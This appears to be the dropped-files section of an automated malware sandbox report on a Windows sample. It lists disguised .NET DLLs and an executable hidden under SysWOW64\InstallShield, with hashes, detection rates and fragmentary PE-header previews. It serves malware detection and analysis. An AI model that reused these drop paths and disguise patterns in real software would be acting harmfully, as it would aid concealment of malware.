                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\jxryOjbr.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):36352
                                                Entropy (8bit):5.668291349855899
                                                Encrypted:false
                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\lPgyvanJ.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):69632
                                                Entropy (8bit):5.932541123129161
                                                Encrypted:false
                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                C:\Users\user\Desktop\lyZggEuH.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):126976
                                                Entropy (8bit):6.057993947082715
                                                Encrypted:false
                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                C:\Users\user\Desktop\mEXomrcz.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):342528
                                                Entropy (8bit):6.170134230759619
                                                Encrypted:false
                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\noipVfbk.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.679286635687991
                                                Encrypted:false
                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\nxFpFSuh.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.660491370279985
                                                Encrypted:false
                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                MD5:240E98D38E0B679F055470167D247022
                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\olJxrfqf.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):46592
                                                Entropy (8bit):5.870612048031897
                                                Encrypted:false
                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\ougxbSJc.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):294912
                                                Entropy (8bit):6.010605469502259
                                                Encrypted:false
                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                C:\Users\user\Desktop\pxmXXnNx.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38400
                                                Entropy (8bit):5.699005826018714
                                                Encrypted:false
                                                SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                MD5:87765D141228784AE91334BAE25AD743
                                                SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\rAZFtXSs.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):46592
                                                Entropy (8bit):5.870612048031897
                                                Encrypted:false
                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\rkXniOKV.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.629584586954759
                                                Encrypted:false
                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\tgLOyLgZ.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):50176
                                                Entropy (8bit):5.723168999026349
                                                Encrypted:false
                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\uHWOOpMo.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.629584586954759
                                                Encrypted:false
                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\vRqeFZrR.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):69632
                                                Entropy (8bit):5.932541123129161
                                                Encrypted:false
                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                C:\Users\user\Desktop\wYpmLLZJ.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):24576
                                                Entropy (8bit):5.535426842040921
                                                Encrypted:false
                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\xsCeWCWh.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.660491370279985
                                                Encrypted:false
                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                MD5:240E98D38E0B679F055470167D247022
                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\zuoNrmbc.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):70144
                                                Entropy (8bit):5.909536568846014
                                                Encrypted:false
                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Windows\SysWOW64\InstallShield\981c2098d799b6

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (362), with no line terminators
                                                Category:dropped
                                                Size (bytes):362
                                                Entropy (8bit):5.837538806616573
                                                Encrypted:false
                                                SSDEEP:6:bOjBZbtSMLp3rxeKh2/+d03KdZ0Xapmu2CJtzMbQUvW5b/JbCGtRQPN3:Qnt/pIx2d03KdZ0qY6jzMbBOLb7QPl
                                                MD5:77E164E3D368E28C191094BED4E258FD
                                                SHA1:A69F4A93D4D44146619EF609BD3244F573CA5B9E
                                                SHA-256:0A1939160A04650530D29087A43B438F011EBBFA686E7B13746FB9FD9616DFEA
                                                SHA-512:2955EA5D0861EF9F0785D38A7EA7E1BCA76781B2CDD15402F86F904F7DD8F89A14B8C95B576BEE7A21B94B33D26274CD79B8F8F13CCD3CC5E1BAE9A563BC53A6
                                                Malicious:false
                                                Preview:xDVOkqqMWt1LYZXy0PFGbZutWqfD9g0AjnQtgAwfBiz3z2TDvUJAxS4XTm23LmMz30luJoRzdkF2k04dXbRpXzMRs3a4I2TZWAA8Ri4HCThNNBxcrZguUgbDoUCQNWrkQpgk06LyhKnES9DqF8MsVjE0i6U7go4pl76hfMlvNsNK2XvoQVKPJ8OrlqC3lOR3Q7cVCfL3WbfnW37KLpqLdpfnsP6yKrJ8bU445amvJR2sdlVrs1s6iGZlczmwjWspRgMC9CPvD4BMwxJH4OFT9NaU4TcFxzMwiNa6ZTsqm73nFNyopf2URZpEF1HpjJ7NsOniWMrlgZrBTxPrexaS61fJhW1hLCGc9p50jPScxR

                                                C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......&...........'.. ... '...@.. .......................`'.......'...@.................................4.'.W.... '.p....................@'...................................................... ............... ..H............text.....&.. ....&................. ..`.rsrc...p.... '.......&.............@..@.reloc.......@'.......&.............@..B................p.'.....H............5".........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                \Device\Null

                                                Download File
                                                Process:C:\Windows\System32\PING.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):502
                                                Entropy (8bit):4.630609828667227
                                                Encrypted:false
                                                SSDEEP:12:PF5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:3dUOAokItULVDv
                                                MD5:AD895E21D0D519A86FAF4781C06E40AD
